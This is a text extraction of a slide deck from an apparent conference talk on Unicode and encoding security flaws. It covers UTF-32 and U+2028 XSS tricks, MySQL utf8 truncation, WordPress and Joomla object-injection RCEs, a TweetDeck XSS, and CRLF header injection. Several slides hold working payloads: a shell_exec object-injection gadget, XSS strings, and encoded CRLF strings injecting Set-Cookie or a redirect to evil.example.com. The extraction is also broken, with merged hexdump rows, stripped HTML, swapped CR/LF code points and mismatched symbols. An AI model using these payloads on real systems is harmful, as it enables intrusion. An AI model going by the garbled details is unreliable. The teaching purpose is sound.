  0000006c
  ∀ (U+2200 FOR ALL)

  View Slide

 84. $ hexdump -C utf-32-xss.html
  00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
  00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
  00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
  00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
  00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
  0000006c
  (U+3E00 CJK UNIFIED
  IDEOGRAPH-3E00)

  View Slide

 85. $ hexdump -C utf-32-xss.html
  00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
  00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
  00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
  00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
  00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
  0000006c
  (U+3C00 CJK UNIFIED
  IDEOGRAPH-3C00)

  View Slide

 86. $ hexdump -C utf-32-xss.html
  00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
  00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
  00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
  00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
  00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
  0000006c
  s (U+0073 LATIN SMALL
  LETTER S)

  View Slide

 87. View Slide

 88. View Slide

 89. https://mths.be/brl

  View Slide

 90. https://mths.be/brl
  OBAMA vs. ᴼᴮᴬᴹᴬ

  View Slide

 91. View Slide

 92. https://mths.be/bvf

  View Slide

 93. https://mths.be/bvf

  View Slide

 94. JavaScript vs. JSON

  View Slide

 95. <br/>// <?php echo strip($userInput); ?><br/>
  /* Note:
  `strip()` strips ASCII newlines and `*/
  ?>

  View Slide

 96. https://mths.be/brn

  View Slide

 97. https://mths.be/brn

  View Slide

 98. <br/>// <?php echo strip($userInput); ?><br/>
  foo[U+2028]alert('XSS')

  View Slide

 99. <br/>// <?php echo strip($userInput); ?><br/>

  foo[U+2028]alert('XSS')

  View Slide

 100. JSON ∉ JavaScript

  View Slide

 101. var data = '"Hello\u2028"';
  // JSON-formatted data containing a string
  // containing an (unescaped!) Line Separator
  eval('(' + data + ')');
  //
  h
  SyntaxError: Unexpected token ILLEGAL
  JSON.parse(data);
  //
  h
  'Hello\u2028'

  View Slide

 102. Always escape JSON-formatted data
  before passing it to a JavaScript parser.
  https://mths.be/jsesc

  View Slide

 103. https://mths.be/jsesc

  View Slide

 104. var data = 'foo\u2028';
  var serialized = JSON.stringify(data);
  //
  h
  '"foo\u2028"' (contains the raw, unescaped
  // Unicode symbol)
  var escaped = jsesc(data, { 'json': true });
  //
  h
  '"foo\\u2028"' (contains an escape sequence
  // for the Unicode symbol
  h
  safer)
  JSON.parse(serialized) == JSON.parse(escaped);
  //
  h
  true (both strings unserialize to the same value)
  https://mths.be/jsesc

  View Slide

 105. var data = 'foo\u2028';
  var serialized = JSON.stringify(data);
  //
  h
  '"foo\u2028"' (contains the raw, unescaped
  // Unicode symbol)
  var escaped = jsesc(data, { 'json': true });
  //
  h
  '"foo\\u2028"' (contains an escape sequence
  // for the Unicode symbol
  h
  safer)
  JSON.parse(serialized) == JSON.parse(escaped);
  //
  h
  true (both strings unserialize to the same value)
  https://mths.be/jsesc

  View Slide

 106. var string = String.fromCharCode(0xD800);
  // a string containing an (unescaped!)
  // lone surrogate
  var data = JSON.stringify(string);
  // the same string as JSON-formatted data
  storeInDatabaseAsUtf8(data);
  //
  h
  error/crash
  sendOverWebSocketConnection(data);
  //
  h
  error/crash/DoS

  View Slide

 107. Always escape JSON-formatted data
  before passing it to a UTF-8 encoder.
  https://mths.be/jsesc

  View Slide

 108. https://mths.be/jsesc

  View Slide

 109. var data = 'foo\uD800';
  var serialized = JSON.stringify(data);
  //
  h
  '"foo\uD800"' (contains the raw, unescaped
  // Unicode symbol)
  var escaped = jsesc(data, { 'json': true });
  //
  h
  '"foo\\uD800"' (contains an escape sequence
  // for the Unicode symbol
  h
  safer)
  JSON.parse(serialized) == JSON.parse(escaped);
  //
  h
  true (both strings unserialize to the same value)
  https://mths.be/jsesc

  View Slide

 110. var data = 'foo\uD800';
  var serialized = JSON.stringify(data);
  //
  h
  '"foo\uD800"' (contains the raw, unescaped
  // Unicode symbol)
  var escaped = jsesc(data, { 'json': true });
  //
  h
  '"foo\\uD800"' (contains an escape sequence
  // for the Unicode symbol
  h
  safer)
  JSON.parse(serialized) == JSON.parse(escaped);
  //
  h
  true (both strings unserialize to the same value)
  https://mths.be/jsesc

  View Slide

 111. Phabricator

  View Slide

 112. View Slide

 113. View Slide

 114. View Slide

 115. uses MySQL

  View Slide

 116. uses MySQL’s ✌utf8✌

  View Slide

 117. View Slide

 118. View Slide

 119. https://mths.be/bro

  View Slide

 120. RCE in WordPress < 3.6.1
  https://mths.be/brq

  View Slide

 121. CVE-2013-4338
  “wp-includes/functions.php in WordPress before 3.6.1 does
  not properly determine whether data has been serialize()d,
  which allows remote attackers to execute arbitrary code by
  triggering erroneous PHP unserialize() operations.”
  https://mths.be/brq

  View Slide

 122. function is_serialized( $data ) {
  $data = trim( $data );
  $length = strlen( $data );
  $lastc = $data[$length - 1];
  if ( ';' !== $lastc && '}' !== $lastc )
  return false;
  $token = $data[0];
  switch ( $token ) {
  case 's' :
  if ( '"' !== $data[$length - 2] ) return false;
  case 'a' : case 'O' :
  return (bool) preg_match( "/^{$token}:[0-9]+:/s", $data );
  case 'b' : case 'i' : case 'd' :
  return (bool) preg_match( "/^{$token}:[0-9.E-]+;\$/",
  $data );
  }
  return false;
  }
  https://mths.be/brq

  View Slide

 123. function is_serialized( $data ) {
  $data = trim( $data );
  $length = strlen( $data );
  $lastc = $data[$length - 1];
  if ( ';' !== $lastc && '}' !== $lastc )
  return false;
  $token = $data[0];
  switch ( $token ) {
  case 's' :
  if ( '"' !== $data[$length - 2] ) return false;
  case 'a' : case 'O' :
  return (bool) preg_match( "/^{$token}:[0-9]+:/s", $data );
  case 'b' : case 'i' : case 'd' :
  return (bool) preg_match( "/^{$token}:[0-9.E-]+;\$/",
  $data );
  }
  return false;
  }
  https://mths.be/brq

  View Slide

 124. WordPress
  Before writing it to the database, data gets serialized
  only if it’s an array or an object, or if is_serialized($data)
  returns true (double serialization)
  After retrieving data from the database, it gets unserialized
  only if is_serialized($data) returns true
  https://mths.be/brq

  View Slide

 125. WordPress
  Before writing it to the database, data gets serialized
  only if it’s an array or an object, or if is_serialized($data)
  returns true (double serialization)
  After retrieving data from the database, it gets unserialized
  only if is_serialized($data) returns true
  https://mths.be/brq
  uses MySQL’s ✌utf8✌

  View Slide

 126. http://mths.be/brq

  View Slide

 127. http://mths.be/brq

  View Slide

 128. class Foo {
  private $command;
  public function setCommand($command) {
  $this->command = $command;
  }
  public function __destruct() {
  if ($this->command) {
  shell_exec($this->command);
  }
  }
  }
  $object = new Foo();
  $object->setCommand('echo "pwned!" > /tmp/pwned.txt');
  $serialized = serialize($object);
  $payload = $serialized . '!';
  https://mths.be/brq

  View Slide

 129. https://mths.be/brq

  View Slide

 130. RCE in Joomla < 3.4.6
  https://mths.be/bvg

  View Slide

 131. CVE-2015-8562
  “Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers
  to conduct PHP object injection attacks and execute arbitrary
  PHP code via the HTTP User-Agent header, as exploited in the
  wild in December 2015.”
  https://mths.be/bvg

  View Slide

 132. https://mths.be/bvh
  Exploit
  1. Serialize a specially-crafted object
  containing PHP code to be executed
  2. Use that as HTTP User-Agent header
  value, with ! as suffix

  View Slide

 133. XSS in WordPress < 4.1.2
  https://mths.be/buj

  View Slide

 134. foo

  https://mths.be/buj
  Exploit: post comment

  View Slide

 135. foo

  https://mths.be/buj
  Exploit: post comment
  This is safe HTML (no XSS).

  View Slide

 136. foo

  https://mths.be/buj
  Exploit: post comment
  This is safe HTML (no XSS).
  While saving to the ✌utf8✌ MySQL database, it gets
  truncated, so we get:

  View Slide

 137. foo

  https://mths.be/buj
  Exploit: post comment
  foo

  This is safe HTML (no XSS).
  While saving to the ✌utf8✌ MySQL database, it gets
  truncated, so we get:

  View Slide

 138. https://mths.be/buj

  View Slide

 139. TweetDeck

  View Slide

 140. View Slide

 141. View Slide

 142. View Slide

 143. function getTweetHtml(tweet) {
  var htmlEscapedTweet = htmlEscape(tweet);
  if (containsEmoji(htmlEscapedTweet)) {
  return replaceSymbolsWithImgTags(
  AccidentallyUndoHtmlEscaping(htmlEscapedTweet)
  );
  } else {
  return htmlEscapedTweet;
  }
  }
  https://mths.be/bsq

  View Slide

 144. Twitter

  View Slide

 145. https://mths.be/bsq
  https://mths.be/buh

  View Slide

 146. https://mths.be/buh
  symbol CR + LF
  code point U+000A U+000D
  URL-encoded
  (note: uses UTF-8!)
  %0A%0D
  decoded (raw bytes) [ 0x0A, 0x0D ]
  Broken CRLF filtering
  symbol CR + LF
  code point U+000A U+000D
  URL-encoded
  (note: uses UTF-8!)
  %0A%0D
  decoded (raw bytes) [ 0x0A, 0x0D ]

  View Slide

 147. https://mths.be/buh
  symbol CR + LF
  code point U+000A U+000D
  URL-encoded
  (note: uses UTF-8!)
  %0A%0D
  decoded (raw bytes) [ 0x0A, 0x0D ]
  Broken CRLF filtering
  symbol CR + LF
  code point U+000A U+000D
  URL-encoded
  (note: uses UTF-8!)
  %0A%0D
  decoded (raw bytes) [ 0x0A, 0x0D ]

  View Slide

 148. https://mths.be/buh
  symbol 㻿
  code point U+560A
  URL-encoded
  (note: uses UTF-8!)
  %E5%98%8A
  decoded (raw bytes) [ 0x56, 0x0A ]
  Bypass part 1: CR (U+000A)

  View Slide

 149. https://mths.be/buh
  symbol 㼁
  code point U+560D
  URL-encoded
  (note: uses UTF-8!)
  %E5%98%8D
  decoded (raw bytes) [ 0x56, 0x0D ]
  Bypass part 2: LF (U+000D)

  View Slide

 150. https://mths.be/buh
  Example exploit
  %E5%98%8A%E5%98%8DSet-Cookie:%20test

  View Slide

 151. View Slide

 152. https://mths.be/bve

  View Slide

 153. https://mths.be/buh
  symbol CR + LF
  code point U+000A U+000D
  URL-encoded
  (note: uses UTF-8!)
  %0A%0D
  decoded (raw bytes) [ 0x0A, 0x0D ]
  Broken CRLF filtering
  symbol CR + LF
  code point U+000A U+000D
  URL-encoded
  (note: uses UTF-8!)
  %0A%0D
  decoded (raw bytes) [ 0x0A, 0x0D ]

  View Slide

 154. https://mths.be/buh
  symbol CR + LF
  code point U+000A U+000D
  URL-encoded
  (note: uses UTF-8!)
  %0A%0D
  decoded (raw bytes) [ 0x0A, 0x0D ]
  Broken CRLF filtering
  symbol CR + LF
  code point U+000A U+000D
  URL-encoded
  (note: uses UTF-8!)
  %0A%0D
  decoded (raw bytes) [ 0x0A, 0x0D ]

  View Slide

 155. https://mths.be/bve
  symbol 㻿
  code point U+560A
  URL-encoded
  (note: uses UTF-8!)
  %E5%98%8A
  decoded (raw bytes) [ 0x56, 0x0A ]
  Bypass part 1: CR (U+000A)

  View Slide

 156. https://mths.be/bve
  symbol 㼁
  code point U+560D
  URL-encoded
  (note: uses UTF-8!)
  %E5%98%8D
  decoded (raw bytes) [ 0x56, 0x0D ]
  Bypass part 2: LF (U+000D)

  View Slide

 157. https://mths.be/bve
  Example exploit
  %E5%98%8A%E5%98%8DLocation:%20https:
  %2F%2Fevil.example.com%2F

  View Slide

 158. Thanks!
  Questions? → @mathias

  View Slide